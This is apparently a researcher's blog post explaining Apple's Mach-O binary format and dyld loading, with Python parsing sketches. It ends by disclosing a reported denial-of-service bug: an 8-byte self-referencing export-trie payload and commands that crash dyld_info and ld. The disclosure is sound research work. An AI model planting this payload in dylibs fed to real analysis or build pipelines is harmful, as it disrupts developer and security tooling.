yo-yo-yo-jbo/macho_structure

The Mach-O file format

In this blogpost, I will be discussing a hole I have in my blog - the Mach-O file format.
I will also be revealing a silly DoS bug I found in one of Apple's utilities that parses Mach-O files.

Introduction

In macOS, every executable, dynamic library, kernel extension, and bundle shares a common skeleton: the Mach-O file format.
If you've ever opened a binary with otool, debugged with lldb, or wondered what dyld is actually loading at process start, you've been brushing up against Mach-O.
Mach-O ("Mach Object") grew out of the Mach kernel work at CMU and was adopted by NeXTSTEP, whose maker NeXT was bought by Apple in a deal announced in 1996.
It replaced a.out and now serves macOS, iOS, watchOS, tvOS, and visionOS.
Just as Linux uses ELF and Windows uses PE, Apple's platforms use Mach-O, which is designed around a few things ELF and PE handle differently:

  • Multi-architecture binaries via the "fat" / universal wrapper
  • Two-level namespaces so symbols carry which library they came from
  • Code signing baked in as a first-class load command
  • Dyld-driven dynamic linking - rather than relying on PLT/GOT conventions alone

The Three Layers

A Mach-O file has three conceptual layers, plus an optional wrapper around them. From the outside in:

  1. An optional Fat header - wraps multiple architecture slices into one file
  2. Mach header - identifies the architecture and file type
  3. Load commands - a directive list telling the loader what to do
  4. Segments and sections - the actual code and data

The Fat Header (Universal Binaries)

When Apple ships a binary that runs on both Apple Silicon and Intel, they wrap two Mach-O files in a single container.
The magic number 0xCAFEBABE at offset 0 signals this. The fat header is stored big-endian, so a little-endian host that reads the field natively sees the byte-swapped value 0xBEBAFECA (FAT_CIGAM).

struct fat_header {
    uint32_t magic;             // FAT_MAGIC / FAT_MAGIC_64
    uint32_t nfat_arch;         // Number of slices
};

Followed by nfat_arch of:

struct fat_arch {
    cpu_type_t    cputype;          // e.g. CPU_TYPE_ARM64
    cpu_subtype_t cpusubtype;
    uint32_t      offset;           // Where this slice lives in the file
    uint32_t      size;
    uint32_t      align;
};
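The two structs above can be read with a few lines of Python. This is a minimal sketch, assuming the 32-bit fat_arch layout shown here (FAT_MAGIC_64 files are not handled); parse_fat and CPU_NAMES are names I made up for illustration, and the demo bytes are synthetic rather than taken from a real binary.

```python
import struct

FAT_MAGIC = 0xCAFEBABE  # fat_header followed by 32-bit fat_arch entries
# Only two CPU types are named here; cpusubtype (e.g. arm64e) is ignored.
CPU_NAMES = {0x01000007: "x86_64", 0x0100000C: "arm64"}


def parse_fat(data):
    """Return [(cpu_name, offset, size), ...], or None if data is not a 32-bit fat file."""
    if len(data) < 8:
        return None
    # Fat headers are big-endian on disk, hence the ">" prefix.
    magic, nfat_arch = struct.unpack_from(">II", data, 0)
    if magic != FAT_MAGIC:
        return None
    if 8 + nfat_arch * 20 > len(data):
        raise ValueError("fat_arch table runs past the end of the data")
    slices = []
    for i in range(nfat_arch):
        # fat_arch: cputype, cpusubtype, offset, size, align (5 x 4 bytes)
        cputype, _subtype, offset, size, _align = struct.unpack_from(">5I", data, 8 + i * 20)
        slices.append((CPU_NAMES.get(cputype, hex(cputype)), offset, size))
    return slices


# Synthetic header with two made-up slices.
demo = struct.pack(">II", FAT_MAGIC, 2)
demo += struct.pack(">5I", 0x01000007, 3, 0x4000, 100, 14)
demo += struct.pack(">5I", 0x0100000C, 2, 0x8000, 200, 14)
print(parse_fat(demo))  # [('x86_64', 16384, 100), ('arm64', 32768, 200)]
```

On a real file you would call parse_fat(open(path, "rb").read()). Since the same magic opens Java class files, a real tool needs an extra sanity check before trusting nfat_arch.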

The lipo utility is quite useful for parsing and handling Fat binaries:

  • lipo -info /bin/ls will tell you which slices are present
  • lipo -thin arm64 ... extracts a single slice

Here's an example:

jbo@JBOs-MacBook-Pro ~ % lipo -info /bin/ls
Architectures in the fat file: /bin/ls are: x86_64 arm64e

As a side note, 0xCAFEBABE is also Java's class file magic, which is why file sometimes needs context to disambiguate.

The Mach Header

Each architecture slice begins with the Mach header. On 64-bit (the vast majority of files in this day and age):

struct mach_header_64 {
    uint32_t magic;             // MH_MAGIC_64 = 0xFEEDFACF
    cpu_type_t cputype;
    cpu_subtype_t cpusubtype;
    uint32_t filetype;          // MH_EXECUTE, MH_DYLIB, MH_BUNDLE, ...
    uint32_t ncmds;             // Number of load commands
    uint32_t sizeofcmds;        // Total bytes of load commands
    uint32_t flags;             // MH_PIE, MH_TWOLEVEL, ...
    uint32_t reserved;
};

The filetype field is the first thing to look at. Here are the common ones:

filetype          Meaning
MH_EXECUTE        A runnable program
MH_DYLIB          A dynamic library (.dylib)
MH_BUNDLE         A plugin (.bundle)
MH_DYLINKER       dyld itself
MH_KEXT_BUNDLE    A kernel extension
MH_OBJECT         A relocatable .o
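To make the header concrete, here is a small Python sketch that decodes a mach_header_64 and names its filetype. It assumes a little-endian 64-bit slice (true for x86_64 and arm64); the numeric constants come from <mach-o/loader.h>, the function name parse_mach_header_64 is mine, and only two flag bits are decoded.

```python
import struct

MH_MAGIC_64 = 0xFEEDFACF
FILETYPES = {
    0x1: "MH_OBJECT", 0x2: "MH_EXECUTE", 0x6: "MH_DYLIB",
    0x7: "MH_DYLINKER", 0x8: "MH_BUNDLE", 0xB: "MH_KEXT_BUNDLE",
}
FLAG_NAMES = {0x80: "MH_TWOLEVEL", 0x200000: "MH_PIE"}  # a small subset only


def parse_mach_header_64(data, base=0):
    """Decode the 32-byte mach_header_64 found at `base` (start of a slice)."""
    (magic, cputype, cpusubtype, filetype,
     ncmds, sizeofcmds, flags, _reserved) = struct.unpack_from("<8I", data, base)
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O header")
    return {
        "cputype": cputype,
        "filetype": FILETYPES.get(filetype, hex(filetype)),
        "ncmds": ncmds,
        "sizeofcmds": sizeofcmds,
        "flags": [name for bit, name in FLAG_NAMES.items() if flags & bit],
    }


# Synthetic arm64 executable header: 17 load commands, PIE + two-level namespace.
demo = struct.pack("<8I", MH_MAGIC_64, 0x0100000C, 0, 0x2, 17, 1234, 0x200085, 0)
info = parse_mach_header_64(demo)
print(info["filetype"], info["ncmds"], info["flags"])
```

For a fat file, `base` would be the offset field of the chosen fat_arch entry.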

Load Commands

Immediately after the header is a list of variable-sized load commands. Each one is an instruction to dyld or the kernel.
Every load command starts with:

struct load_command {
    uint32_t cmd;           // Command type
    uint32_t cmdsize;       // Total size (including the header)
};

There are dozens of load command types. Here are a couple of important ones:

  • LC_SEGMENT_64 - Describes a segment of the file to map into memory.
  • LC_LOAD_DYLIB - Dependencies (e.g. /usr/lib/libSystem.B.dylib means that this Mach-O depends on libSystem.B.dylib and therefore it should be loaded).
  • LC_MAIN - Entry point for executables (replaced LC_UNIXTHREAD around macOS 10.8).
  • LC_DYLD_INFO_ONLY / LC_DYLD_CHAINED_FIXUPS - Rebase and binding information.
  • LC_SYMTAB / LC_DYSYMTAB - Symbol tables.
  • LC_CODE_SIGNATURE - Embedded code signing blob.
  • LC_BUILD_VERSION - Minimum OS version and SDK info.
  • LC_RPATH - Runtime search path for dylibs (the @rpath token resolves against these).
  • LC_UUID - A unique build identifier, used by dsymutil to pair binaries with their .dSYM debug bundles.
  • LC_FUNCTION_STARTS - Compact-encoded list of function start addresses for the unwinder and debuggers.

We can run otool -l <binary> to dump the full list of the load commands from a given binary.
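Walking the load commands by hand is a short loop: read cmd and cmdsize, hand out the bytes, advance by cmdsize. The sketch below assumes a little-endian 64-bit slice and knows only a handful of command numbers (taken from <mach-o/loader.h>); iter_load_commands is a hypothetical helper name. Note the bounds checks: cmdsize is attacker-controlled, so a parser that trusts it will happily loop forever or read out of bounds.

```python
import struct

LC_NAMES = {
    0x2: "LC_SYMTAB", 0xB: "LC_DYSYMTAB", 0xC: "LC_LOAD_DYLIB",
    0xE: "LC_LOAD_DYLINKER", 0x19: "LC_SEGMENT_64", 0x1B: "LC_UUID",
    0x1D: "LC_CODE_SIGNATURE", 0x26: "LC_FUNCTION_STARTS", 0x32: "LC_BUILD_VERSION",
    0x8000001C: "LC_RPATH", 0x80000022: "LC_DYLD_INFO_ONLY", 0x80000028: "LC_MAIN",
    0x80000033: "LC_DYLD_EXPORTS_TRIE", 0x80000034: "LC_DYLD_CHAINED_FIXUPS",
}


def iter_load_commands(data, base=0):
    """Yield (name, raw_bytes) for each load command of the slice at `base`."""
    magic, _, _, _, ncmds, sizeofcmds, _, _ = struct.unpack_from("<8I", data, base)
    if magic != 0xFEEDFACF:
        raise ValueError("not a little-endian 64-bit Mach-O header")
    offset = base + 32              # load commands start right after the header
    end = offset + sizeofcmds
    if end > len(data):
        raise ValueError("sizeofcmds runs past the end of the data")
    for _ in range(ncmds):
        if offset + 8 > end:
            raise ValueError("load command header out of bounds")
        cmd, cmdsize = struct.unpack_from("<II", data, offset)
        if cmdsize < 8 or offset + cmdsize > end:
            raise ValueError("bad cmdsize")
        yield LC_NAMES.get(cmd, hex(cmd)), data[offset:offset + cmdsize]
        offset += cmdsize


# Synthetic slice: header + LC_UUID (24 bytes) + LC_MAIN (24 bytes).
demo = struct.pack("<8I", 0xFEEDFACF, 0x0100000C, 0, 0x2, 2, 48, 0, 0)
demo += struct.pack("<II16s", 0x1B, 24, bytes(16))
demo += struct.pack("<IIQQ", 0x80000028, 24, 0x4000, 0)
names = [name for name, _ in iter_load_commands(demo)]
print(names)  # ['LC_UUID', 'LC_MAIN']
```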

Segments and Sections

The LC_SEGMENT_64 load command defines a segment.
Segments are contiguous ranges of the file that get mapped into memory with specific permissions.
Each segment is then divided into sections. The standard layout for an executable:

__PAGEZERO

The first segment, but it has no file content - it's a 4GB (on 64-bit) unmapped region at virtual address 0.
Its only job is to make null-pointer dereferences crash hard - it's not readable, writable or executable.
From my experiments, modifying this to be smaller than 4GB would make AMFI kill the process upon loading, at least on AArch64.

__TEXT

It's read-only and executable. Contains the following sections:

  • __text - Actual machine instructions.
  • __stubs / __stub_helper - Jump stubs for lazily-bound external functions.
  • __cstring - NUL-terminated string literals.
  • __const - read-only constants.
  • __unwind_info - Compact unwind tables for exception handling.

Being read-only and executable means __TEXT can be shared between processes - every running copy of /bin/ls shares the same physical pages for its code.

__DATA and __DATA_CONST

Mapped as readable and writable. Apple split this into two segments to harden the runtime:

  • __DATA_CONST is mapped read-write briefly while dyld applies fixups at load time, then flipped to read-only. It holds things like the GOT and function pointers that shouldn't change after process start.
  • __DATA is read-write throughout the program's life: globals, BSS and so on.

Typical sections include __got, __la_symbol_ptr (lazy symbol pointers), __data, __bss, and __common.

__LINKEDIT

The catch-all segment at the end of the file.
Holds data that dyld needs but the running program doesn't address directly: the symbol table, string table, chained fixups, code signature, function starts table, and so on. It is mapped as read-only.
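The segment and section layout described above maps onto two fixed-size structs: segment_command_64 (72 bytes) followed by nsects copies of section_64 (80 bytes each). Here is a rough Python sketch that decodes one LC_SEGMENT_64 command; it assumes little-endian data and the field order from <mach-o/loader.h>, and parse_segment_64 is a name I picked for the example. The demo segment is synthetic.

```python
import struct

SEGMENT_FMT = "<II16sQQQQiiII"      # cmd, cmdsize, segname, vmaddr, vmsize,
                                    # fileoff, filesize, maxprot, initprot, nsects, flags
SECTION_FMT = "<16s16sQQIIIIIIII"   # sectname, segname, addr, size, offset, align, ...
SEGMENT_SIZE = struct.calcsize(SEGMENT_FMT)   # 72
SECTION_SIZE = struct.calcsize(SECTION_FMT)   # 80


def _name(raw):
    # Names are NUL-padded to 16 bytes (and not terminated when exactly 16 long).
    return raw.split(b"\x00")[0].decode("ascii", errors="replace")


def _prot(bits):
    # VM_PROT_READ = 1, VM_PROT_WRITE = 2, VM_PROT_EXECUTE = 4
    return "".join(ch if bits & bit else "-" for bit, ch in ((1, "r"), (2, "w"), (4, "x")))


def parse_segment_64(cmd_bytes):
    """Decode one LC_SEGMENT_64 load command, including its section names."""
    (cmd, cmdsize, segname, vmaddr, vmsize, _fileoff, filesize,
     _maxprot, initprot, nsects, _flags) = struct.unpack_from(SEGMENT_FMT, cmd_bytes, 0)
    if cmd != 0x19:
        raise ValueError("not an LC_SEGMENT_64 command")
    if SEGMENT_SIZE + nsects * SECTION_SIZE > len(cmd_bytes):
        raise ValueError("nsects does not fit inside the command")
    sections = []
    for i in range(nsects):
        fields = struct.unpack_from(SECTION_FMT, cmd_bytes, SEGMENT_SIZE + i * SECTION_SIZE)
        sections.append(_name(fields[0]))
    return {"name": _name(segname), "vmaddr": vmaddr, "vmsize": vmsize,
            "filesize": filesize, "prot": _prot(initprot), "sections": sections}


# Synthetic __TEXT segment with a single __text section.
demo = struct.pack(SEGMENT_FMT, 0x19, 72 + 80, b"__TEXT", 0x100000000, 0x4000,
                   0, 0x4000, 5, 5, 1, 0)
demo += struct.pack(SECTION_FMT, b"__text", b"__TEXT", 0x100003000, 0x100,
                    0x3000, 2, 0, 0, 0x80000400, 0, 0, 0)
seg = parse_segment_64(demo)
print(seg["name"], seg["prot"], seg["sections"])  # __TEXT r-x ['__text']
```

Run over a real binary's load commands, the same function would show __PAGEZERO with filesize 0 and protection "---".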

Practical example

Run this on any macOS executable:

otool -hV /bin/ls       # Mach header
otool -lV /bin/ls       # Load commands (verbose)
otool -L /bin/ls        # Just the LC_LOAD_DYLIB entries
nm /bin/ls              # Symbol table
codesign -dv /bin/ls    # Code signature info

For a deeper view, the dyld_info utility (added in macOS 12) gives a much nicer breakdown of chained fixups, exports, and bindings than the older otool -I output.

How dyld works

When you exec() a Mach-O executable, the kernel does the following:

  1. Maps the __TEXT, __DATA, __DATA_CONST, and __LINKEDIT segments according to the LC_SEGMENT_64 commands.
  2. Loads the dynamic linker named in LC_LOAD_DYLINKER (almost always points to /usr/lib/dyld).
  3. Hands control to dyld.

At that point dyld takes over and does the following:

  1. Walks the LC_LOAD_DYLIB list and recursively loads dependencies.
  2. Applies rebases (adjusting pointers for ASLR slide) and binds external symbols using the chained fixups or older bind opcodes.
  3. Runs initializers (+load methods, __attribute__((constructor)) functions, etc.).
  4. Jumps to the entry point given by LC_MAIN.
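The rebase step in particular is simple arithmetic: every pointer stored in the image was computed for the preferred load address, so dyld adds the ASLR slide to each one. Here is a toy Python model of just that idea. It is not how dyld stores or finds the locations (real binaries encode them as rebase opcodes or packed chained-fixup pointers); apply_rebases and the explicit offset list are assumptions made for the sake of the example.

```python
import struct


def apply_rebases(image, rebase_offsets, slide):
    """Add `slide` to each raw 64-bit little-endian pointer at the given offsets, in place."""
    for off in rebase_offsets:
        (value,) = struct.unpack_from("<Q", image, off)
        struct.pack_into("<Q", image, off, (value + slide) & 0xFFFFFFFFFFFFFFFF)
    return image


# A 16-byte "data segment": plain data at offset 0, a pointer at offset 8.
image = bytearray(16)
struct.pack_into("<Q", image, 8, 0x100004000)   # pointer as written by the static linker
apply_rebases(image, [8], slide=0x2000)          # image was loaded 0x2000 bytes higher
rebased = struct.unpack_from("<Q", image, 8)[0]
print(hex(rebased))  # 0x100006000
```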

DoS due to a cyclic export Trie

While Mach-O's structure is less complex (at least in my opinion) when compared to PE or ELF files, parsing binary files (in general) is difficult. Here's a bug I recently reported to Apple Product Security against macOS 26.4 that's a nice illustration of why the format-level details matter.

What's an export Trie

Earlier I mentioned LC_DYLD_INFO_ONLY and LC_DYLD_CHAINED_FIXUPS.
There's a related load command, LC_DYLD_EXPORTS_TRIE, that points (via dataoff / datasize) at a blob inside __LINKEDIT containing the dylib's exported symbols, encoded as a Trie (prefix tree) rather than a flat list.
Each node in the Trie is a few bytes:

  • A ULEB128 terminal size (0 if this node isn't itself a complete symbol, otherwise the size of the export info payload that follows).
  • The export info payload (flags, address, etc.) if the terminal size is non-zero.
  • A child count (in a single byte).
  • For each child: a NUL-terminated edge label (string fragment) and a ULEB128 child node offset relative to the Trie start.

To resolve a symbol like _hello, you walk from the root, matching label fragments against the symbol name and following the corresponding child offset, until you land on a terminal node.
The format is compact and well-suited to symbol lookup. It is also entirely controlled by whoever produced the binary.
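The node layout and the lookup walk can be sketched in Python as follows. This is an illustration under assumptions, not dyld's implementation: the 25-byte trie is hand-built, the payload is assumed to be the regular-export shape (ULEB128 flags followed by a ULEB128 address), and read_uleb128 / lookup are my own helper names. Error handling for truncated input is minimal.

```python
def read_uleb128(buf, pos):
    """Decode one ULEB128 value at `pos`; return (value, position after it)."""
    result = 0
    shift = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated ULEB128")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def lookup(trie, symbol):
    """Return (flags, address) for `symbol`, or None if it is not exported."""
    remaining = symbol.encode()
    node = 0
    while True:
        terminal_size, pos = read_uleb128(trie, node)
        if not remaining:
            if terminal_size == 0:
                return None          # a prefix of some symbol, not a symbol itself
            flags, pos = read_uleb128(trie, pos)
            address, _ = read_uleb128(trie, pos)
            return flags, address
        pos += terminal_size         # skip the export payload, if any
        child_count = trie[pos]
        pos += 1
        next_node = None
        for _ in range(child_count):
            end = trie.index(b"\x00", pos)
            label = trie[pos:end]
            child_offset, pos = read_uleb128(trie, end + 1)
            # Only non-empty labels are followed, so every step consumes input
            # and this particular walk cannot loop forever.
            if next_node is None and label and remaining.startswith(label):
                next_node, matched = child_offset, len(label)
        if next_node is None:
            return None
        remaining = remaining[matched:]
        node = next_node


TRIE = (
    b"\x00\x01_hel\x00\x08"           # root @0: edge "_hel" -> node @8
    b"\x00\x02lo\x00\x11p\x00\x15"    # node @8: edges "lo" -> @17, "p" -> @21
    b"\x02\x00\x10\x00"               # node @17: terminal, flags 0, address 0x10
    b"\x02\x00\x20\x00"               # node @21: terminal, flags 0, address 0x20
)
print(lookup(TRIE, "_hello"), lookup(TRIE, "_help"), lookup(TRIE, "_hel"))
```

Here _hello and _help share the "_hel" prefix, which is where the space saving over a flat list comes from.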

The bug

Inside dyld/mach_o/ExportsTrie.cpp, the function mach_o::GenericTrie::recurseTrie() walks the trie recursively, descending into each child via _trieStart + childNodeOffset.
The only validation on childNodeOffset is that it is non-zero.
More importantly, there is no depth bound, and no tracking of visited nodes.
So, if the Trie contains a cycle - node B's child offset points back to node B (or any ancestor) - recurseTrie() keeps recursing until it walks off the bottom of the stack and hits the stack-guard page, at which point the kernel kills the process with EXC_BAD_ACCESS / KERN_PROTECTION_FAILURE.
There is a funny asymmetry, by the way - the iterative sibling function GenericTrie::hasEntry(), used at runtime symbol lookup, does maintain a visitedNodeOffsets array (cap 256) and rejects cycles cleanly. The recursive walker, used during validation, doesn't. So, there are really two implementations of the same traversal - only one is hardened.
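For comparison, here is what a hardened recursive walk could look like, sketched in Python. This is my own illustration and not Apple's code or fix: it tracks the offsets on the current path (so a child pointing at itself or at an ancestor is rejected), bounds the depth, and checks offsets against the blob size. The names collect_exports and MAX_DEPTH, and the limit of 128, are arbitrary choices.

```python
MAX_DEPTH = 128  # arbitrary cap for this sketch


def read_uleb128(buf, pos):
    result = shift = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated ULEB128")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def collect_exports(trie, offset=0, prefix=b"", path=None, out=None):
    """Return all exported names, raising ValueError on cycles or bad offsets."""
    path = set() if path is None else path
    out = [] if out is None else out
    if offset >= len(trie):
        raise ValueError("child offset outside the trie")
    if offset in path:
        raise ValueError(f"cycle detected at offset {offset}")
    if len(path) >= MAX_DEPTH:
        raise ValueError("trie is too deep")
    path.add(offset)
    terminal_size, pos = read_uleb128(trie, offset)
    if terminal_size:
        out.append(prefix.decode(errors="replace"))
    pos += terminal_size
    if pos >= len(trie):
        raise ValueError("truncated node")
    child_count = trie[pos]
    pos += 1
    for _ in range(child_count):
        end = trie.find(b"\x00", pos)
        if end < 0:
            raise ValueError("unterminated edge label")
        child_offset, next_pos = read_uleb128(trie, end + 1)
        collect_exports(trie, child_offset, prefix + trie[pos:end], path, out)
        pos = next_pos
    path.discard(offset)  # siblings may legitimately revisit offsets off this path
    return out


GOOD = (b"\x00\x01_hel\x00\x08" b"\x00\x02lo\x00\x11p\x00\x15"
        b"\x02\x00\x10\x00" b"\x02\x00\x20\x00")
CYCLIC = bytes([0x00, 0x01, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04])
print(collect_exports(GOOD))  # ['_hello', '_help']
try:
    collect_exports(CYCLIC)
except ValueError as err:
    print("rejected:", err)
```

Either check alone (path tracking or a depth cap) would be enough to turn the crash into a clean error.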

An 8-byte proof of concept

The malicious Trie payload is tiny: two nodes, eight bytes, with node B's only child being itself:

# node A @ offset 0  ->  child @ offset 4
0x00,  # terminalSize = 0 (not a complete symbol)
0x01,  # childCount = 1
0x00,  # edge label "" (just the NUL terminator)
0x04,  # childNodeOffset = 4  -> node B

# node B @ offset 4  ->  child @ offset 4 (self-loop)
0x00,  # terminalSize = 0
0x01,  # childCount = 1
0x00,  # edge label ""
0x04,  # childNodeOffset = 4  -> node B again
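To see why these eight bytes are fatal to an unguarded recursive walker, here is a toy Python model of one. It is deliberately naive and is not dyld's code: like the behaviour described above, its only check on the child offset is that it is non-zero. Python reports the runaway recursion as a RecursionError where the native tool dies on the stack guard page. naive_walk and crashes are hypothetical names.

```python
PAYLOAD = bytes([
    0x00, 0x01, 0x00, 0x04,   # node A @0: one child, empty label, -> offset 4
    0x00, 0x01, 0x00, 0x04,   # node B @4: one child, empty label, -> offset 4 (itself)
])


def naive_walk(trie, offset=0):
    """Unhardened recursive walk: no depth bound, no visited-node tracking."""
    terminal_size = trie[offset]          # single-byte ULEB128 is enough for this payload
    pos = offset + 1 + terminal_size
    child_count = trie[pos]
    pos += 1
    for _ in range(child_count):
        end = trie.index(b"\x00", pos)    # end of the edge label
        child_offset = trie[end + 1]      # single-byte ULEB128 again
        pos = end + 2
        if child_offset != 0:             # the only validation performed
            naive_walk(trie, child_offset)


def crashes(trie):
    """Return True if the naive walker recurses until the interpreter gives up."""
    try:
        naive_walk(trie)
    except RecursionError:
        return True
    return False


print(crashes(PAYLOAD))          # True
print(crashes(bytes([0, 0])))    # False: a single childless node
```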

Drop that blob into the LC_DYLD_EXPORTS_TRIE region of any ~16 KB dylib (the script in the report uses otool -l to locate dataoff / datasize, then patches the bytes in place), and:

dyld_info -exports tiny_cycle.dylib         # exit 139, SIGSEGV
clang -o loader loader.c tiny_cycle.dylib   # ld: Bus error: 10

The crash report shows roughly 65,000 stack frames of mach_o::GenericTrie::recurseTrie before ___chkstk_darwin catches the overflow.
I put my PoC in cycle_poc.sh:

jbo@JBOs-MacBook-Pro macho % ./cycle_poc.sh
./tiny_cycle.dylib [arm64]:
./cycle_poc.sh: line 16: 97961 Segmentation fault: 11  dyld_info ./tiny_cycle.dylib

Afterwards, you will find a dyld-info-<timestamp>.ips file under ~/Library/Logs/DiagnosticReports/ with the relevant information in it:

{
    ...
    "id": 13829582,
    "recursionInfoArray": [
      {
        "hottestElided": 4,
        "coldestElided": 65272,
        "depth": 65275,
        "keyFrame": {
          "imageOffset": 97916,
          "symbol": "mach_o::GenericTrie::recurseTrie(unsigned char const*, dyld3::OverflowSafeArray<char, 4294967295ull>&, int, bool&, void (char const*, std::__1::span<unsigned char const, 18446744073709551615ul>, bool&) block_pointer) const",
          "symbolLocation": 520,
          "imageIndex": 0
        }
      }
    ],
}

Impact

The runtime loader doesn't crash on dlopen() of the same file, because runtime symbol lookup goes through the iterative hasEntry().
So this isn't a runtime exploitation primitive - it's simply a denial-of-service against tooling that validates the Trie:

  • /usr/bin/dyld_info, called by automated analysis pipelines.
  • The Apple system linker ld, invoked transitively by clang <...> some.dylib. Build pipelines that link against attacker-supplied prebuilt frameworks crash with no actionable diagnostic.
  • Any tool using mach_o::ExportsTrie::forEachExportedSymbol() from libdyld_introspection - malware analysis services, app review pre-scanners, EDR products that triage uploaded binaries.

Because the failure mode is a stack-guard fault rather than a memory write, there is no code-execution path.
It is a clean DoS against developer and analysis tooling. As a side note, the issue I found was tracked under OE1105704294054, and was not deemed important enough for a security fix, so I feel comfortable releasing that information.

Summary

In this blogpost, I finally got to talk about the Mach-O structure and even highlight an issue in Apple's own code.
In future posts, I intend to discuss how Objective-C code is compiled and how that affects the file structure.

Stay tuned!

Jonathan Bar Or
